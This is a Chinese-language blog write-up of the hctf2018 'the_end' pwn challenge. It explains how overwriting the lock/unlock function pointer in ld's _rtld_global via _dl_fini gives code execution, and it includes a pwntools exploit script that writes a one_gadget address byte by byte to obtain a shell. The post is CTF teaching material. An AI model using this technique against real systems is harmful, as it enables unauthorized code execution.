劫持rtld_global中的函数指针&&hctf2018_the_end

最新推荐文章于 2023-02-17 19:36:58 发布
最新推荐文章于 2023-02-17 19:36:58 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: linux_pwn 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/124099638
版权

文章目录

前言

在libc-2.23之后,加入了对IO vtable的check机制,所以有本用IO打的hctf2018_the_end转而使用另一种方法,也就是要介绍的劫持rtld_global中的函数指针

劫持rtld_global中的函数指针

ld相关函数在使用rtld_global时都需要先上锁, 以避免多进程下的条件竞争问题
相关函数包括但不限于:
_dl_open()
_dl_fini()
….

exit_function_list

上节我们提到了exit函数的三个用途
清理tls
调用_IO_cleanup
这节漏洞的原因就是第二个,exit_function_list
exit_function_list是系统在初始化的时候自动为我们装载上的,然后在exit的时候会一次调用进行析构操作,析构函数里面有个叫_dl_fini的函数,问题也就在这里面

__run_exit_handlers调用_dl_fini

在这里插入图片描述
可以看到在这里面有上锁和释放的操作,我们以上锁为例

# define __rtld_lock_lock_recursive(NAME) GL(dl_rtld_lock_recursive) (&(NAME).mutex)
#  define GL(name) _rtld_global._##name

这里我们先进行一个简化操作

 __rtld_lock_lock_recursive(GL(dl_load_lock));=>
  __rtld_lock_lock_recursive(_rtld_global._dl_load_lock); =>
  _rtld_global._dl_rtld_lock_recursive   (&(_rtld_global._dl_load_lock).mutex)

参数部分我们就不关注
可以看到实际调用的是dl_rtld_lock_recursive函数指针,释放锁的操作也是类似,我们去gdb里看看_rtld_global

_rtld_global结构

在这里插入图片描述
这个结构比较大,一个屏幕放不下,我就选取了对应的部门,可以看到lock和unlock也保存了对应的真实地址
在这里插入图片描述
可以看到_rtld_global位于ld的data段,所以我们可以直接修改
这里其实涉及了ld和libc的偏移问题,如果版本一致的其实差不多

攻击

找到偏移
在这里插入图片描述
这里也只需要修改低6位
在这里插入图片描述

ru(b"gift ")
libc_base = int(r(14), 16) - libc.sym["sleep"]
ld_base = libc_base + 0x3F1000
ld = ELF("./ld-2.27.so")
_dl_rtld_lock_recursive = ld_base + ld.sym["_rtld_global"] + 0xF00
one_gadget_addr = libc_base + one_gadget[1]

s(p64(_dl_rtld_lock_recursive))
s(p8(one_gadget_addr & 0xFF))
s(p64(_dl_rtld_lock_recursive + 1))
s(p8((one_gadget_addr >> 8) & 0xFF))
s(p64(_dl_rtld_lock_recursive + 2))
s(p8((one_gadget_addr >> 16) & 0xFF))
s(p64(_dl_rtld_lock_recursive + 1))
s(p8((one_gadget_addr >> 8) & 0xFF))
s(p64(_dl_rtld_lock_recursive + 2))
s(p8((one_gadget_addr >> 16) & 0xFF))

sl(b"exec 1>&0")
it()

这里后两边只是为了凑够5次
这里注意打远程由于stdout关闭了,所以我们看不见输出
需要exec 1>&0重定向
这里本来我本地打lock是可以的,但远程好像不行
于是我就换成了unlock
偏移+0xf08就可以了

azraelxuemo
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IO_FILE:2018 HCTF the_end
Mira_Hu的博客
02-13 1688
kips: libc2.23 标准输入输出 定义顺序 #define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \ static _IO_lock_t _IO_stdfile_##FD##_lock = _IO_lock_initializer; \ struct _IO_FILE_plus NAME \ = {FILEBUF_LITERAL(CHAI...
a_gnu_libc_interceptor_via_rtld_audit:基于C语言RTLD-Audit机制Linux的GNU-Libc Audit共享库
05-24
通过RTLD-Audit的GNU libc拦截器 在制品 该项目正在进行。 实施不完整,可能会发生变化。 该文档可能不准确。 描述 使用GNU运行时链接程序(LD)的Audit机制Linux GNU GLibc Audit共享库。 审核程序是一个共享库...
2018-HCTF
11-14 180
Pwn The_end 可利用点:任意地址写5个字节的数据,已经得知libc的基址 漏洞点:通过IDA F7单步步入exit函数的实现可以发现,exit会call一个ld.so段的地址,因此我们可以修改ld.so的那个地址为one_gadget,从而getshell。 babyprintf_ver2 FILE_IO还没有开始学习,待补充! 转载于:https://w...
2018 hctf seven
qq_41071646的博客
07-30 285
本来是看 2018 hctf的 io pwn题 也就是 the_end 题目 那个题目其实我是看的懂的,,但是不知道为啥本地打不通,, 自己 的 va 还有 伪造的 还有 one 都写进去了 ,,, 都没搞定,, 最后发现了 有个题目很好玩, 算是迷宫 题目 而且还是驱动的 重点在 read 函数里面 这里注册了一个驱动函数 我推测是 键盘过滤,, 后来分析了一下...
dlsym获取变量或函数接口时RTLD_LAZY RTLD_NOW RTLD_GLOBAL区别
肥尾鱼(嵌入式)
09-30 7837
linux使用void *dlopen(const char *filename, int flag)调用so动态库时, 其flag有:RTLD_LAZY RTLD_NOW RTLD_GLOBAL,其含义分别为: RTLD_LAZY:在dlopen返回前,对于动态库存在的未定义的变量(如外部变量extern,也可以是函数)不执行解析,就是不解析这个变量的地址。 RTLD_NOW:与上面不...
已知libc地址爆破TLS、ld.so等地址
seaaseesa的博客
07-01 1046
已知libc地址爆破TLS、ld.so等地址 在大多数情况下,远程的ld.so以及TLS等结构的地址与libc地址之间的偏移与本地的会不一样,但是大致处于一个范围内,并且,在同一个系统里,这个差值是固定的,其差值的变化往往在偏移的第1.5BYTE~2.5BYTE的位置,即地址十六进制的第4、5个数,因此我们只需爆破2个十六进制数即可。 以列题来说明 BCTF_2018_bugstore 在函数有栈溢出,但是有canary保护 我们来看看输入函数,输入函数遇到\0就结束了输入,而我们知道can
零停重启程序工具Huptime研究
09-09
零停重启目标程序,比如一个网络服务程序,不用丢失和断任何消息实现重新启动,正在处理的消息也不会断和丢失,重启的方法是给目标程序的进程发SIGHUP信号。
Linux动态库函数的详解
09-15
- `RTLD_GLOBAL`:使库的符号对所有后续加载的库可见。 - `RTLD_LOCAL`:默认,只使库的符号对本库可见。 - `RTLD_NODELETE`:防止卸载动态库。 - `RTLD_NOLOAD`:检查库是否已加载,但不加载。 - `RTLD_...
iOS安全防护系列之字符串及系统函数隐藏详解
08-27
为了隐藏系统函数,我们可以直接通过函数指针调用,而不是通过函数名: ```c // 导入动态链接库函数 #import // 获取库句柄 void * handle = dlopen("/usr/lib/system/libcommonCrypto.dylib", RTLD_LAZY); // ...
Linux C++ libdl.so dlfcn.h使用方法(dlopen()、dlsym()、dlclose()、dlerror())(用于动态链接库操作)(懒加载、立即加载)共享库符号、动态库
Dontla的博客
02-17 3387
RTLD_GLOBAL” 是 dlopen() 函数的一个标志,表示在打开共享库时将其定义的符号全局可见,也就是说,共享库的符号可以被后续打开的其他共享库所使用。是指在共享库定义的可以被其他共享库和主程序使用的符号,这些符号在编译时会被加入到共享库的全局符号表,并且可以通过 dlopen() 和 dlsym() 等函数在程序运行时动态加载和使用。是指在共享库定义的只能被本地共享库的其他符号所使用的符号,这些符号在编译时不会被加入到全局符号表,只能在本地共享库内部进行使用。
GDB调试汇总
li4850729的专栏
11-01 2967
http://www.360doc.com/content/12/1101/21/11033862_245176417.shtml       初识GDB  GDB的出现减轻了开 发人员的负担,他们可以在程序运行的时候单步跟踪自己的代码,或者通过断点暂时止程序的执行。此外,他们还能够随时察看变量和内存的当前状态,并监视关 键的数据结构是如何影响代码运行的。      调试
linux用函数进入某一路径,在linux程序里面,知道一个函数地址,改函数是属于某个动态库的,怎么样得到这个动态库的全路径名??...
weixin_30356285的博客
05-12 112
如上另:WIN32可以通过VirtualQuery()和GetModuleFileName()获得。|gnu的扩展函数dladdr可以做到你所要的,mandladdr可以查到帮助。另外dl_iterate_phdr可以查到当前进程所装在的所有符号,每查到一个就会调用你指定的回调函数。下面的代码示例如何使用dl_iterate_phdr和dladdr#define_GNU_SOURCE#incl...
linux程序启动时glibc的调用流程
choumin的专栏
01-21 1143
ELF 文件头的 e_entry 项指明了入口地址,可以通过 objdump -f 命令查看 ELF 文件头信息,一般来说,入口地址的就是代码段 _start 符号的起始地址,在 _start 调用了 libc 的 __libc_start_main(),该函数的大致流程是: 1)判断是否是静态链接库,如果是,则调用 _dl_start_user() ,否则调用 __libc_init_first(); 2)调用 __libc_csu_init(); 3)调用 main(); 4)调用 __GI
hctf[pwn] the-end
九层台
11-12 1982
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { signed int i; // [rsp+4h] [rbp-Ch] void *buf; // [rsp+8h] [rbp-8h] sleep(0); printf("here is a gift %p, good luck ;)\n", &a...
linux .so有什么借口,为什么有些程序需要连接ld-linux.so.x这个库
weixin_29292535的博客
05-13 310
环境:目标系统为armeabi,32bit,linux,gcc4.9,glibc2.20,宿主机器为ubuntu12.04执行readelf -d xxx.so,发现有些是需要连接ld-linux.so.x的,比如libffi.so:$ /disk7/shuyin.wsy/tv/prebuilts/gcc/linux-x86/arm/arm-linux-gnueabi-4.9-glibc-2.20...
由安卓开发的一个坑引发的问题解决之道浅析
心现识变妙莲华
03-11 3683
由安卓开发的一个坑引发的问题解决之道浅析
排查一个潜在的内存访问问题 -- 用 C 写代码的日常
weixin_34319374的博客
01-30 302
最近几个月,我开始涉足 C 开发的领域,遇到的最大的挑战在于如何管理好内存。从异常情况下避免内存泄漏,到排查代码逻辑里面的 invalid read,还有复用过程没能清理好数据的问题,几乎各种坑都体验过一次。 举半个月前经历的一件事为例。跑单元测试的过程,我发现 valgrind 报了个 invalid read 错误: ==3297...
linux进程分析之旅04---程序加载分析之_RTLD
welljrj的博客
06-23 1412
一.RTLD的作用 当程序需要动态链接 的应用被操作系统加载时,系统必须要重定位,然后加载它所需要的所有动态库文件。 这项工作是由glibcRTLD(Run time dynamic linker)来负责完成的。而ld.so是动态链接程序RTLD生成的动态链接库.那么就出现一个问题:RTLD也就是ld.so是如何加载,加载完成之后它又是如何加载其他的so函数的呢?通过下...
JAVA加载动态库时,可以指定RTLD_GLOBAL类似的选项吗
最新发布
06-13
在JAVARTLD_GLOBAL常量的值为2。因此,可以使用以下代码加载动态库并指定RTLD_GLOBAL选项: ```java System.load("/path/to/library.so", 2); ``` 这将加载名为library.so的动态库,并指定RTLD_GLOBAL选项。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值